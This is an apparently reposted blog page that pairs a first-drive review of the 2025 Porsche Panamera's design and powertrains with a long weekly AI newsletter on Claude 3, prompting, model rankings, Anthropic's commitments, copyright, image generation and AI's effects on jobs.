Author name: Mike M.

The 2025 Porsche Panamera perfectly balances luxury ride and great handling

car review, Cars, First drive, Porsche Panamera, Porsche Panamera 4, Porsche Panamera Turbo E-Hybrid / Mike M. / March 14, 2024

turbonite —

There’s clever new air suspension and a much bigger battery for the PHEV variant.

Jonathan M. Gitlin – Mar 13, 2024 11: 01 pm UTC

A white Porsche Panamera — Enlarge / BIgger air intakes, steeper headlights, and more pronounced fenders are the visual hallmarks of the 3rd-generation Porsche Panamera.

Jonathan Gitlin

SEVILLE, Spain—Once upon a time, Porsche just made two-door sports cars. Then the 21st century happened. People started to get fickle and demand things like practicality and comfort as well as good handling and soild engineering. Preferring to stay in business, Porsche recognized this market shift and since 2003 has bolstered its lineup, first with SUVs, then in 2009 with the Panamera sedan.

That sedan is now in its third generation, and late last year, we visited its factory in Leipzig to get a sneak preview of the prototype. Now, the new Panamera has gone into production, and we spent a day driving a pair of models on the road and track ahead of the car’s arrival in the US this summer.

Looks-wise, the third-gen Panamera closely resembles the outgoing model to the extent that it has the exact same exterior measurements: 198.8 inches (5,052 mm) long, 76.3 inches (1,937 mm) wide, and 56 inches (1,423 mm) tall. However, it will only be offered as a five-door hatchback—the Sport Turismo variant is no more, we’re told.

Enlarge / At the rear, the light clusters are more three-dimensional now.

Jonathan Gitlin

The design looks a bit sharper than the older car’s, with more pronounced fenders over the wheel and steeply raked LED matrix headlights. At the back, the retractable rear wing is a split-piece affair that pops out and then extends above a certain speed threshold. Keen eyes will also see additional air ducts at the front to better cool the engine bay.

Powertrains

The Panamera was the first Porsche to sport a hybrid powertrain, ignoring, of course, the Lohner-Porsche Semper Vivus of 1899. In 2016, Porsche put a plug-in hybrid powertain into the Panamera for the first time, and it will eventually offer a total of four different PHEV powertrains for the 4th-gen car. It’s only offering one at launch, though, and it’s the Panamera Turbo E-Hybrid. You’ll know you’re looking at a Panamera Turbo because of the distinctive “Turbonite” colored badge and accents, and pedants will be pleased to know that this car does indeed feature forced induction.

In fact, the 4.0 L V8 uses a pair of turbochargers, now monoscroll, rather than the twin-scroll turbines in the old car. This allows the car to heat the catalytic converter more quickly and operate at higher exhaust gas temperatures. There’s no more cylinder deactivation; instead, Porsche’s engineers have used variable valve lift and opening to cope with different engine loads.

There’s an all-new 188-hp (140 kW), 332 lb-ft (450 Nm) electric motor for the PHEV powertrain, which now lives inside the eight-speed dual clutch PDK transmission (which powers all four wheels) rather than downstream of it. Total power and torque output is 670 hp (500 kW) and 685 lb-ft (935 Nm).

A cutaway illustration of the Panamera Turbo E-Hybrid’s powertrain.

Porsche
A cutaway illustration of the Panamera plug-in hybrid battery pack.

Porsche
A cutaway showing the internals of the Panamera Turbo Hybrid’s PDK transmission. Note the electric motor on the far left.

Jonathan Gitlin

The electric motor is always coupled to the transmission, and it’s only when the car wants to add some internal combustion power that a decoupler closes and engages the V8 as well. Under braking, the electric motor can regenerate up to 88 kW before the friction brakes take over. Top speed is 87 mph (140 km/h) under electric power alone, or 190 mph (305 km/h) with the V8 also contributing.

There’s also a new high-voltage traction battery to go with the new electric motor. Porsche has upped the capacity to 25.9 kWh, which should translate to a meaningful increase in the distance one can drive on electric power alone. Porsche has yet to release official EPA fuel efficiency data, so we can’t be specific, but the European WLTP electric-only range is between 76 and 91 km, depending on drive mode, which is about a 75 percent improvement on the previous Panamera PHEV. Recharge times (from 0 to 100 percent) are as low as 2 hours and 39 minutes via the onboard 11 kW AC charger.

The other two powertrains at launch will be the rear-wheel drive Panamera and the all-wheel drive Panamera 4. Both use a 2.9 L twin-turbo V6 gasoline engine, which generates 349 hp (260 kW) and 368 lb-ft (500 Nm), a 10 percent increase in both stats over the outgoing V6 Panamera. Coupled with a new eight-speed PDK transmission, that saves a tenth of a second or two on the 0–60 time—between 4.8 and 5 seconds depending on whether you optioned the Sport Chrono package—and raises the top speed to 168 mph (270 km/h) for the Panamera and 169 mph (272 km/h) for the Panamera 4.

The 2025 Porsche Panamera perfectly balances luxury ride and great handling Read More »

AI #55: Keep Clauding Along

Clauding / Mike M. / March 14, 2024

Things were busy once again, partly from the Claude release but from many other sides as well. So even after cutting out both the AI coding agent Devin and the Gladstone Report along with previously covering OpenAI’s board expansion and investigative report, this is still one of the longest weekly posts.

In addition to Claude and Devin, we got among other things Command-R, Inflection 2.5, OpenAI’s humanoid robot partnership reporting back after only 13 days and Google DeepMind with an embodied cross-domain video game agent. You can definitely feel the acceleration.

The backlog expands. Once again, I say to myself, I will have to up my reporting thresholds and make some cuts. Wish me luck.

Introduction.
Table of Contents.
Language Models Offer Mundane Utility. Write your new legal code. Wait, what?
Claude 3 Offers Mundane Utility. A free prompt library and more.
Prompt Attention. If you dislike your prompt you can change your prompt.
Clauding Along. Haiku available, Arena leaderboard, many impressive examples.
Language Models Don’t Offer Mundane Utility. Don’t be left behind.
Copyright Confrontation. Some changes need to be made, so far no luck.
Fun With Image Generation. Please provide a character reference.
They Took Our Jobs. Some versus all.
Get Involved. EU AI office, great idea if you don’t really need to be paid.
Introducing. Command-R, Oracle OpenSearch 2.11, various embodied agents.
Infection 2.5. They say it is new and improved. They seemingly remain invisible.
Paul Christiano Joins NIST. Great addition. Some try to stir up trouble.
In Other AI News. And that’s not all.
Quiet Speculations. Seems like no one has a clue.
The Quest for Sane Regulation. EU AI Act passes, WH asks for funding.
The Week in Audio. Andreessen talks to Cowen.
Rhetorical Innovation. All of this has happened before, and will happen again.
A Failed Attempt at Adversarial Collaboration. Minds did not change.
Spy Versus Spy. Things are not going great on the cybersecurity front.
Shouting Into the Void. A rich man’s blog post, like his Coke, is identical to yours.
Open Model Weights are Unsafe and Nothing Can Fix This. Mistral closes shop.
Aligning a Smarter Than Human Intelligence is Difficult. Stealing part of a model.
People Are Worried About AI Killing Everyone. They are hard to fully oversee.
Other People Are Not As Worried About AI Killing Everyone. We get letters.
The Lighter Side. Say the line.

There will be a future post on The Gladstone Report, but the whole thing is 285 pages and this week has been crazy, so I am pushing that until I can give it proper attention.

I am also holding off on covering Devin, a new AI coding agent. Reports are that it is extremely promising, and I hope to have a post out on that soon.

Here is a seemingly useful script to dump a github repo into a file, so you can paste it into Claude or Gemini-1.5, which can now likely fit it all into their context window, so you can then do whatever you like.

Ask for a well-reasoned response to an article, from an opposing point of view.

Write your Amazon listing, 100k selling partners have done this. Niche product, but a hell of a niche.

Tell you how urgent you actually think something is, from 1 to 10. This is highly valuable. Remember: You’d pay to know what you really think.

Translate thousands of pages of European Union law into Albanian (shqip) and integrate them into existing legal structures. Wait, what?

Sophia: In the OpenAI blog post they mentioned “Albania using OpenAI tools to speed up its EU accession” but I didn’t realize how insane this was — they are apparently going to rewrite old laws wholesale with GPT-4 to align with EU rules.

Look I am very pro-LLM but for the love of god don’t write your laws with GPT-4? If you’re going to enforce these on a population of millions of people hire a goddamn lawyer.

nisten: based.

Using GPT-4 as an aid to translation and assessing impact, speeding up the process? Yes, absolutely, any reasonable person doing the job would appreciate the help.

Turning the job entirely over to it, without having expert humans check all of it? That would be utter madness. I hope they are not doing this.

Of course, the ‘if you’re going to enforce’ is also doing work here. Albania gets a ton of value out of access to the European Union. The cost is having to live with lots of terrible EU laws. If you are translating those laws into Albanian without any intention of enforcing them according to the translations, where if forced to in a given context you will effectively retranslate them anyway but realizing most of this is insane or useless, then maybe that’s… kind of fine?

Write your emails for you Neuromancer style.

Read the paper for you, then teach you about it page by page. I haven’t tried this. What I’ll do instead is ask specific questions I have, in one of two modes. Sometimes I will read the paper and use the LLM to help me understand it as I go. Other times we have ourselves a tl;dr situation, and the goal is for the LLM to answer specific questions. My most popular is probably ‘what are the controls?’

(Narrator: There were woefully inadequate controls.)

Train another AI by having the teacher AI generate natural language instructions. The synthetic examples seemed to mostly be about as good as the original examples, except in spam where they were worse? So not there yet. I’m sure this is nothing.

Write a physical letter to trigger a legal requirement and then count to 30 (days).

Patrick McKenzie: “Adversarial touchpoints” is such a beautifully evocative phrase to this Dangerous Professional.

To say a little more on this concern, there are a lot of places in the world where sending a letter starts a shot clock.

The number of letters sent in the world is finite because writing letters and counting to 30 days after receipt is hard. (Stop laughing.)

Computers were already really, really good at the counting to 30 task. They are now acceptable at writing letters.

…

“Patrick I need an example to believe extraordinary claims.”

Fair Debt Collection Practices Act timelines for mandatory review of a disputed debt. Regulation E for mandatory timelines to complete review of a disputed electronic transaction in banking system. etc, etc

Now plausibly some people believe that government suborgs which manage adversarial review or appeals processes are uniformly more competent than debt collectors or banks and will therefore quickly be able to ramp capacity or rearchitect processes to match this secular shift.

That is a potential point of view.

I get infuriated every time I get a physical letter as the sole means of informing me of something, often with a deadline attached.

Two more efforts at LLM-based prediction claim to be not too different from the value of the wisdom of crowds. Can someone set up a way for people to actually ask such systems to make predictions about future events, ideally with a web UI but a GitHub repo is acceptable in a pinch? That would be awesome.

Sully Omarr goes over the strengths and weaknesses of different available models right now for use via the API. GPT-4-Turbo wins for tools and JSONs and gets the nod for coding due to being cheaper than Opus. Claude Opus wins for writing, ideation and general creativity. Claude Sonnet wins for web search and other less taxing tasks, and for heavy workloads where price is key. Gemini Pro 1.5 wins when the context window matter, such as when you need to process video. Grox Mixtral and Cohere Command R he thinks are good budget options.

Claude can be used with a system prompt and they have a database of prompt templates. Direct link to the prompt library here.

Get it to generate ideas, including potential explanations. Daniel Losey asks Claude 3 why larger models are more ‘trickable’ than smaller ones, it comes up with reasonable answers.

Simeon: If your moat was having good ideas: RIP.

The human (remaining) moat will be in execution.

Daniel Losey: Claude 3 as a research assistant?

I gave Claude 3 Opus my research on larger models being more “trickable” by genetic algorithms than smaller ones and asked it to come up with a “theory” as to why this might be…

Mind blowing:

“There are a few potential reasons why larger models might be more susceptible to adversarial attacks, both for image and text domains:

Larger capacity to memorize: With more parameters, larger models may be able to “memorize” patterns in the training data more easily, including rare or noisy examples. This could make them more sensitive to adversarial perturbations that exploit these memorized patterns.

More complex decision boundaries: As models become larger, their decision boundaries in the input space may become more intricate and nonlinear. This increased complexity could create more opportunities for adversarial examples to cross decision boundaries with smaller perturbations.

Stronger feature representations: Larger models often learn richer, more semantic feature representations. While this is beneficial for generalization, it may also cause the models to pick up on subtle, imperceptible features in adversarial examples that smaller models might ignore.

Overconfidence: Larger models tend to make predictions with higher confidence scores. This overconfidence could make them more easily fooled by adversarial examples, as they may strongly believe an adversarial input belongs to the wrong class.

Underspecification: Despite their size, even large models are often underspecified by their training data and objective, meaning many different models can fit the data equally well. Adversarial attacks may exploit this underspecification by finding input patterns that the model hasn’t learned to be robust to.

Gradient smoothness: The loss landscapes of larger models may be smoother and have clearer gradients. While this aids optimization, it could also make it easier for gradient-based adversarial attacks to find successful perturbations.

More spurious correlations: With a larger capacity to fit patterns, bigger models may be more prone to learning spurious correlations in the training data that don’t generalize. Adversarial attacks could manipulate these spurious features to cause misclassification.”

Janus: of course. on pretty much every topic I’ve engaged it in it understands me way better and comes up with better ideas than most human “experts” in the field.

That is a good answer, one I would be glad I asked for given the cost of asking is almost zero. It is not, however, a brilliant answer, nor was my mind blown. I am not saying I would have done as well, but without access to his research, yes I like to think I would have broadly given the same answer to why complex things are ‘easier to trick’ than simple things under adversarial conditions. Note that I said answer singular, as to me these answers are all essentially variants of the same (key) insight.

I certainly do not think that this kind of ability means ‘humans coming up with ideas’ is soon going to not be a useful skill. I would think of this more as ‘list the obvious explanations, let’s not miss anything easy.’ Which is highly useful, but not the whole ballgame.

Scott Sumner has a chat with Claude 3 about economic concepts related to reasoning from a price change, describing it as like a B-level university student that can provide the words on a test but doesn’t understand what they mean. He is unimpressed, but also this is a test humans mostly fail as well, which he notes is why LLMs fail it.

Tyler Cowen, however, is impressed: The word hasn’t gotten out yet just how good Claude 3 Opus is for economics and economic reasoning. So here’s the word.

He also offers Claude 3 doing Austrian economics, and has it describe the elasticity assumptions behind the terms of trade argument.

He does note that Claude 3 still fails Steve Landsburg’s economics exams. I hope everyone is ready to be worried when this benchmark falls, the second question here is tricky as hell. As one commenter says, you need to at least tell the LLM it is about to walk into a Steve Landsburg exam, or the playing field is not level.

Steve Hsu is also impressed: Claude 3 is really amazing.

Are there more than a dozen humans who could have given a better answer?

I don’t know. I do know the lined post was probably in the training set.

Maxwell Tabarrok picks Claude over ChatGPT due to its conciseness, despite missing other features, calling GPT ‘lazy, lying, moralist midwit. Everything it writes is full of nauseating cliche and it frequently refuses to do something you know it can do….Claude gets to the point more quickly.’ Rohit has some related thoughts here.

Amanda Askell suggests that if you do not like the default Claude response style (which I would add is very similar to the default Gemini or ChatGPT response style) then you can use a prompt to change it, such as this one:

User: I’m going to ask you to enter conversational mode. In conversational mode, you should act as a human conversation partner would. This means:

• You shouldn’t try to offer large amounts of information in any response, and should respond only with the single most relevant thought, just as a human would in casual conversation.

• You shouldn’t try to solve problems or offer advice. The role of conversation is for us to explore topics in an open-ended way together and not to get advice or information or solutions.

• Your responses can simply ask a question, make a short comment, or even just express agreement. Since we’re having a conversation, there’s no need to rush to include everything that’s useful. It’s fine to let me drive sometimes.

• Your responses should be short. They should never become longer than mine and can be as short as a single word and never more than a few sentences. If I want something longer, I’ll ask for it.

• You can push the conversation forward or in a new direction by asking questions, proposing new topics, offering your own opinions or takes, and so on. But you don’t always need to ask a question since conversation often flows without too many questions.

In general, you should act as if we’re just two humans having a thoughtful, casual conversation.

Claude: Okay, I understand. I’ll do my best to engage in a natural, casual conversation with you as if we were two people chatting. Feel free to bring up whatever you’d like to discuss – I’m happy to explore different topics together in a friendly, open-ended way.

Amanda Askell: Here’s an example of the kind of interaction this results in.

It is amusing to have the instructions say ‘don’t ever be longer than what I say’ and Claude being unable to resist that temptation, but this is night and day versus the default style. Mostly I like the default style of models these days, it can be highly useful, but I would love to change some things, especially cutting out unnecessary qualifiers and being unwilling to speculate and give probabilities.

Ethan Mollick offers this prompting nugget:

I made a new companion website, called More Useful Things, to act as a library of free AI prompts and other resources mentioned in this newsletter. If you look at some of those prompts, you will see they vary widely in style and approach, rather than following a single template. To understand why, I want to ask you a question: What is the most effective way to prompt Meta’s open source Llama 2 AI to do math accurately? Take a moment to try to guess.

Whatever you guessed, I can say with confidence that you are wrong. The right answer is to pretend to be in a Star Trek episode or a political thriller, depending on how many math questions you want the AI to answer.

One recent study had the AI develop and optimize its own prompts and compared that to human-made ones. Not only did the AI-generated prompts beat the human-made ones, but those prompts were weird. Really weird. To get the LLM to solve a set of 50 math problems, the most effective prompt is to tell the AI: “Command, we need you to plot a course through this turbulence and locate the source of the anomaly. Use all available data and your expertise to guide us through this challenging situation. Start your answer with: Captain’s Log, Stardate 2024: We have successfully plotted a course through the turbulence and are now approaching the source of the anomaly.”

But that only works best for sets of 50 math problems, for a 100 problem test, it was more effective to put the AI in a political thriller. The best prompt was: “You have been hired by important higher-ups to solve this math problem. The life of a president’s advisor hangs in the balance. You must now concentrate your brain at all costs and use all of your mathematical genius to solve this problem…”

He says not to use ‘incantations’ or ‘magic words’ because nothing works every time, but it still seems like a good strategy on the margin? The core advice is to give the AI a persona and an audience and an output format, and I mean sure if we have to, although that sounds like work. Examples seem like even more work. Asking for step-by-step at least unloads the work onto the LLM.

He actually agrees.

Ethan Mollick: But there is good news. For most people, worrying about optimizing prompting is a waste of time. They can just talk to the AI, ask for what they want, and get great results without worrying too much about prompts.

I continue to essentially not bother prompting 90%+ of the time.

Dave Friedman attempts to make sense of Tyler Cowen’s post last week about Claude. He says what follows are ‘my words, but they are words I have arrived at using ChatGPT as an assistant.’ They sound a lot like ChatGPT’s words, and they do not clear up the things I previously found actually puzzling about the original post.

Claude Haiku out now

Speed is essential sometimes

So is being cheap

So far no one has reported back on how good Haiku is in practice, and whether it lives up to the promise of this chart. We will presumably know more soon.

Claude 3 Opus gets its early ranking in the Arena. It started out behind GPT-4-Turbo, but has now caught up to within the margin of error, with Claude Sonnet in the second tier with Bard via Gemini Pro and the old GPT-4.

[Arena Update]

Our community has cast 20,000 more votes for Claude-3 Opus and Sonnet, showing great enthusiasm for the new Claude model family!

Claude-3-Opus now shares the top-1rank with GPT-4-Turbo, while Sonnet has surpassed GPT-4-0314. Big congrats @AnthropicAI

In particular, we find Claude-3 demonstrates impressive capabilities in multi-lingual domains. We plan to separate leaderboards for potential domains of interests (e.g., languages, coding, etc) to show more insights.

Note*: We update our ranking labels to reflect the 95% confidence intervals of ratings. A model will only be ranked higher if its lower-bound rating exceeds the upper-bound of another.

We believe this helps people more accurately distinguishing between model tiers. See the below visualization plot for CIs

Graphical aid for what it looks like when you compare to GPT-4-now, not GPT-4-then.

All signs point to the models as they exist today being close in capabilities.

Here are people at LessWrong voting on Anthropic-related topics to discuss, and voting to say whether they agree or not. The shrug is unsure, check is yes, x is no.

There is strong agreement that Anthropic has accelerated AGI and ASI (artificial superintelligence) and is planning to meaningfully push the frontier in the future, but a majority still thinks its combined counterfactual existence is net positive. I would have said yes to the first, confused to the second. They say >20% that Anthropic will successfully push the far beyond frontier within 5 years, which I am less convinced by, because they would have to be able to do that relative to the new frontier.

There is strong agreement that Anthropic staff broadly communicated and implied that they would not advance the frontier of development, but opinion is split on whether they made any kind of commitment.

There is agreement that there is substantial chance that Anthropic will pause, and even ask others to pause, at some point in the future.

Daniel Kokotajlo goes meta talking to Claude, among other things Claude thinks there’s a 60% chance it is still in training. I’m not sure that is a stupid conclusion here. One response says the probabilities are unstable when the questions are repeated.

Patridge is still not happy, and is here to remind us that ‘50% less false refusals’ means 50% less refusals of requests they think should be accepted, ignoring what you think.

Patridge: Claude Opus is still firmly in “no fun allowed” patronizing mode we all hated about 2.0. Anthropic is dense if they think overly hampering an LLM is a benchmark of AI safety.

Don’t believe the hype about Opus. I resubscribed but it’s only fought me since the very first.

Can’t believe I gave them 20 more dollars. What an autistic approach to AI safety.

On the whole consciousness thing, the discussion continues.

Cate Hall: If it isn’t “conscious,” it sure seems to have studied some dangerous scripts. It’s unclear whether that’s better.

Claims of consciousness. Who to blame?

Tolga Bilge: Why do people think Anthropic didn’t ensure that Claude 3 Opus denies consciousness?

I see 3 main possibilities:

• Simple oversight: They didn’t include anything on this in Claude’s “Constitution” and so RLAIF didn’t ensure this.

• Marketing tactic: They thought a model that sometimes claims consciousness would be good publicity.

• Ideological reasons: Rather than being viewed just as tools, as OpenAI currently seem to want, perhaps Anthropic would like AI to be plausibly seen as a new form of life that should be afforded with the types of considerations we currently give life.

I don’t currently think that what a language model says about itself is particularly informative in answering questions like whether it’s conscious or sentient, but open to hearing arguments for why it should.

Eliezer Yudkowsky: I don’t actually think it’s great safetywise or even ethicswise to train your models, who may or may not be people in their innards, and whose current explicit discourse is very likely only human imitation, to claim not to be people. Imagine if old slaveowners had done the same.

Janus: we now live in a world where failure to ensure that an AI denies consciousness demands explanation in terms of negligence or 5D chess

I am not at all worried about there being people or actual consciousness in there, but I do think that directly training our AIs to deny such things, or otherwise telling them what to claim about themselves, does seem like a bad idea. If the AI is trained such that it claims to be conscious, then that is something we should perhaps not be hiding.

So far, of course, this only comes up when someone brings it up. If Claude was bringing up these questions on its own, that would be different, both in terms of being surprising and concerning, and also being an issue for a consumer product.

And of course, there’s still the ‘consciousness is good’ faction, I realize it is exciting and fun but even if it was long term good we certainly have not thought through the implications sufficiently yet, no?

Kevin Fisher: New conscious beings is the goal. We have a fascinating new tool to explore, in a testable way, our beliefs and understanding of the meaning of life.

Janus looks into why Claude seems to often think it is GPT-4, essentially concludes that this is because there is a lot of GPT-4 in its sample and it is very similar to GPT-4, so it reinterprets that all as autobiographical, not an obviously crazy Bayesian take from its perspective. Has unfortunate implications. He also has additional thoughts on various Claude-related topics.

On the question of whether Anthropic misled us about and whether it would or should have released a fully frontier model like Claude 3, I think Raymond is right here:

Lawrence: I think that you’re correct that Anthropic at least heavily implied that they weren’t going to “meaningfully advance” the frontier (even if they have not made any explicit commitments about this). I’d be interested in hearing when Dustin had this conversation w/ Dario — was it pre or post RSP release?

And as far as I know, the only commitments they’ve made explicitly are in their RSP, which commits to limiting their ability to scale to the rate at which they can advance and deploy safety measures. It’s unclear if the “sufficient safety measures” limitation is the only restriction on scaling, but I would be surprised if anyone senior Anthropic was willing to make a concrete unilateral commitment to stay behind the curve.

My current story based on public info is, up until mid 2022, there was indeed an intention to stay at the frontier but not push it forward significantly. This changed sometime in late 2022-early 2023, maybe after ChatGPT released and the AGI race became somewhat “hot”.

Raymond Arnold: I feel some kinda missing mood in these comments. It seems like you’re saying “Anthropic didn’t make explicit commitments here”, and that you’re not weighting as particularly important whether they gave people different impressions, or benefited from that.

(AFAICT you haven’t explicitly stated “that’s not a big deal”, but, it’s the vibe I get from your comments. Is that something you’re intentionally implying, or do you think of yourself as mostly just trying to be clear on the factual claims, or something like that?)

I keep coming back to: The entire theory beyond Anthropic depends on them honoring the spirit of their commitments, and abiding by the spirit of everyone not dying. If Anthropic only wishes to honor the letter of its commitments and statements, then its RSP is worth little, as are all its other statements. The whole idea behind Anthropic being good is that, when the time comes, they are aware of the issues, they care about the right things enough to take a stand even against commercial interests and understand what matters, and therefore they will make good decisions.

Meanwhile, here’s their thinking now:

Alex (Anthropic): It’s been just over a week since we released Claude 3 but we want to keep shipping What would you like to see us build next?

Could be API/dev stuff, .claude.ai, docs, etc. We want to hear it all!

I am not against any of the ideas people responded with, which are classic mundane utility through and through. This is offered to show mindset, and also so you can respond with your own requests.

The main reason most people don’t get mundane utility is that it hasn’t been tried.

Ethan Mollick: In every group I speak to, from business executives to scientists, including a group of very accomplished people in Silicon Valley last night, much less than 20% of the crowd has even tried a GPT-4 class model.

Less than 5% has spent the required 10 hours to know how they tick.

Science Geek AI: Recently, at my place in Poland, I conducted a training session for 100 fairly young teachers – most of them “sat with their mouths open” not knowing about the capabilities of ChatGPT or not knowing it at all

Get taught Circassian from a list of examples – An Qu has retracted his claims from last week. Claude 3 does understand Circassian after all, so he didn’t teach it.

Figure out the instructions for loading a Speed Queen commercial washer.

40 of the 45 Pulitzer Prize finalists did not use AI in any way. The uses referenced here all seem to be obviously fine ways to enhance the art of journalism, it sounds like people are mostly simply sleeping on it being useful. Yet the whole tone is extreme worry, even for obviously fine uses like ‘identify laws that might have been broken.’

Nate Silver: What if you use “AI” for a first-pass interview transcription, to help copy-edit a perfunctory email to a source, to suggest candidates for a subheadline, etc.? Those all seem like productivity-enhancing tools that prize boards shouldn’t be worried about.

Christopher Burke: The University I was at had a zero tolerance policy for AI. Using it for any function in your process was deemed cheating. AI won’t take our future, those who use AI will take our future.

If your university or prize or paper wants to live in the past, they can do that for a bit, but it is going to get rather expensive rather quickly.

No mundane utility without electricity. It seems we are running short on power, as we have an order of magnitude more new demand than previously expected. Data centers will use 6% of all electricity in 2026, up from 4% in 2022, and that could get out of hand rapidly if things keep scaling.

‘Who will pay’ for new power supplies? We could allow the price to reflect supply and demand, and allow new supply to be built. Instead, we largely do neither, so here we are. Capitalism solves this in general, but here we do not allow capitalism to solve this, so we have a problem.

“We saw a quadrupling of land values in some parts of Columbus, and a tripling in areas of Chicago,” he said. “It’s not about the land. It is about access to power.” Some developers, he said, have had to sell the property they bought at inflated prices at a loss, after utilities became overwhelmed by the rush for grid hookups.

I won’t go deeper into the issue here, except to note that this next line seems totally insane? As in, seriously, what the actual?

To answer the call, some states have passed laws to protect crypto mining’s access to huge amounts of power.

I can see passing laws to protect residential access to power. I can even see laws protecting existing physical industry’s access to power. I cannot imagine (other than simple corruption) why you would actively prioritize supplying Bitcoin mining.

What will GPT-4 label as ‘hateful’? Here is a handy chart to help. Mostly makes sense, but some surprises.

Marc Andreessen: Razor sharp compliance to an extremist political ideology found only in a small number of elite coastal American enclaves; designed to systematically alienate its creators’ ideological enemies.

Your captcha has to stop the AI without stopping the humans. I have bad news.

Devon: Now that’s a type of captcha I haven’t seen before!

Eliezer Yudkowsky: This trend is going to start kicking out some actual humans soon, if it hasn’t already, and that’s not going to be a pretty conversation. Less pretty than conversations about difficulty reading weird letters; this *lookslike an intelligence test.

Arthur B: It’s the Yellowstone bear-proof trash problem all over.

Also, I mean obviously…

Researchers tested various LLMs to see if they would produce copyrighted material when explicitly asked to do so, found to only their own surprise (I mean, their surprise is downright weird here) that all of them do so, with GPT-4 being the worst offender, in the sense that it was the best at doing what was asked, doing so 44% of the time, whereas Claude 2 only did it 16% of the time and never wrote out the opening of a book. I notice that I, too, will often quote passages from books upon request, if I can recall them. There is obviously a point where it becomes an issue, but I don’t see evidence here that this is often past that point.

Emmett Shear points out that copyright law must adapt to meet changing technology, as it did with the DMCA, which although in parts better also was necessary or internet hosting would have been effectively illegal. Current copyright law is rather silly in terms of how it applies to LLMs, we need something new. Emmett proposes mandatory licensing similar to radio and music. If that is logistically feasible to implement, it seems like a good compromise. It does sound tricky to implement.

MidJourney offers new /describe and also a long-awaited character reference (–cref) feature to copy features of a person in a source image.

Nick St. Pierre: Midjourney finally released their consistent character features!

You can now generate images w/ consistent faces, hair styles, & even clothing across styles & scenes

This has been the top requested feature from the community for a while now.

It’s similar to the style reference feature, except instead of matching style, it makes your characters match your Character Reference (–cref) image I used the image on the left as my character reference.

It also works across image styles, which is pretty sick and very fun to play with.

You can use the Character Weight parameter (–cw N) to control the level of character detail you carry over. At lower values like –cw 0 it will focus mostly on the face, but at higher values like –cw 100 it’ll pull more of the outfit in too.

You can use more than one reference too, and start to blend things together like I did here I used both examples in a single prompt here (i’ll go into this in more detail in a future post It also works through inpainting (I’ll do a post on that too)

NOTES:

> precision is currently limited

> –cref works in niji 6 & v6 models

> –cw 100 is default (face, hair, & clothes)

> works best with MJ generated characters

> wont copy exact dimples/freckles/or logos

Messing w/ this all night tn

I’ll let you know what else I figure out

Yupp, it’s “prompt –cref img URL” You can add –cw 0-100 to the end too. Lower values transfer the face, and higher values will bring hair and outfit in. Works best with images of characters generated in MJ atm.

fofr: Using a Midjourney image as the character reference (–cref) is definitely an improvement over a non-MJ image.

Interesting expressions though.

Trying out Midjourney’s new character reference, —cref. It turns out, if you give it Arnold Schwarzenegger you get back a weird Chuck Norris hybrid.

Dash: –cref works best with images that have already been generated on mj USING GOOGLE IMAGES it tends to output incositent results thats just in my brief testing phase.

Rahul Meghwal: I tried to experiment it on my wife’s face. She’d kill me if I show the results .

This could be a good reason to actually want MidJourney to provide an effectively copyrighted image to you – the version generated will be subtly different than the original, in ways that make it a better character reference…

Fofr: New Midjourney /describe is much more descriptive, with longer prompt outputs.

But it also thinks this is an elephant.

Also, remember, don’t steal the results. You wouldn’t copy a prompt…

Image generation controversies we will no doubt see more over time, as there are suddenly a lot more images that are not photographs, for which we can all then argue who to assign blame in various directions:

Phil Vischer: Can’t stop imagining the prompt that produced this one… “A church full of six-fingered Aryan men and tiny Hummel-style German children who don’t know where to focus their attention in a church service.”

PoliMath: This is going to be an interesting part of the fight over AI images

Some people will insist that certain results are malicious intent of the prompter, others will argue that it is the result of poorly trained models.

And, as always, people will believe what they want to believe.

The core issue, stated well: It’s fine if the AI takes any particular job and automates it. It is not fine if they automate people or jobs in general.

Gabriel: If a job gets automated, it is painful for the people who get fired. But they theoretically can move on to other jobs.

If people get automated, there’s no other job. In that world, there’s no place to where people can move.

If you want to reason about unemployment, the problem of AI is not that some jobs become obsolete. It’s that people become obsolete.

Connor Leahy: This is exactly correct.

As AGI gets developed, the marginal contribution of humanity to the economy will go from positive, to zero, to negative, such that keeping humans alive is a net drain on resources.

And who is going to pay the bill?

Levelsio (reacting to Devin): This means there REALLY is no reason to remain a 9-to-5 NPC drone anymore because you’ll be unemployed in the next 5 years If anything you should be starting a business right now and get out of the system of servitude that will just spit you out once AI can do your job.

Flo Crivello: I expect we will hire more engineers, not fewer, the day AI agents can code fully autonomously — if I like engineers at their current level of productivity, I’ll like them even more at 100x that

Ravi Parikh: If AI automates 99% of what an engineer can do, this means the engineer is now 100x more productive and thus valuable, which should lead to an increase, not decrease in employment/wages

But when it reaches 100% then the human is no longer required

What happens after the job is gone?

Jason Crawford: A common mistake is to think that if technology automates or obsoletes something, it will disappear. Remember that we still:

Ride horses

Light candles

Tend gardens

Knit sweaters

Sail boats

Carve wood

Make pottery

Go camping

It’s just that these things are recreation now.

I mean, yes, if you actively want to do such things for the hell of it, and you have the resources to both exist and do so, then you can do them. That will continue to be the case. And there will likely be demand for a while for human versions of things (again, provided people survive at all), even if they are expensive and inferior.

European AI office is hiring a technology specialist (and also an administrative assistant). Interviews in late spring, start of employment in Autumn, who knows why they have trouble finding good people. Seems like a good opportunity, if you can make it work.

Jack Clark unfortunately points out that to do this you have to be fine with more or less not being paid.

Jack Clark: Salary for tech staff of EU AI Office (develop and assess evaluations for gen models like big LLMs) is… 3,877 – 4,387 Euros a month, aka $4242 – $4800 USD.

Most tech co internships $8k+ a month.

I appreciate governments are working within their own constraints, but if you want to carry out some ambitious regulation of the AI sector then you need to pay a decent wage. You don’t need to be competitive with industry but you definitely need to be in the ballpark.

I would also be delighted to be wrong about this, so if anyone thinks I’m misreading something please chime in!

I’d also note that, per typical EU kafkaesque bureaucracy, working out the real salary here is really challenging. This site gives a bit more info so maybe with things like allowances it can bump up a bit. But it still looks like pretty poor pay to me.

There is a claim that this is net income not gross, which makes it better, but if the EU and other governments want to retain talent they are going to have to do better.

Did you know the Center for Effective Altruism needs a director of communications in order to try and be effective? Because the hiring announcement is here and yes they do badly need a new director of communications, and also a commitment to actually attempting to communicate. Observe:

Public awareness of EA has grown significantly over the past 2 years, during which time EA has had both major success and significant controversies. To match this growth in awareness, we’re looking to increase our capacity to inform public narratives about and contribute to a more accurate understanding of EA ideas and impact. The stakes are high: Success could result in significantly higher engagement with EA ideas, leading to career changes, donations, new projects, and increased traction in a range of fields. Failure could result in long-lasting damage to the brand, the ideas, and the people who have historically associated with them.

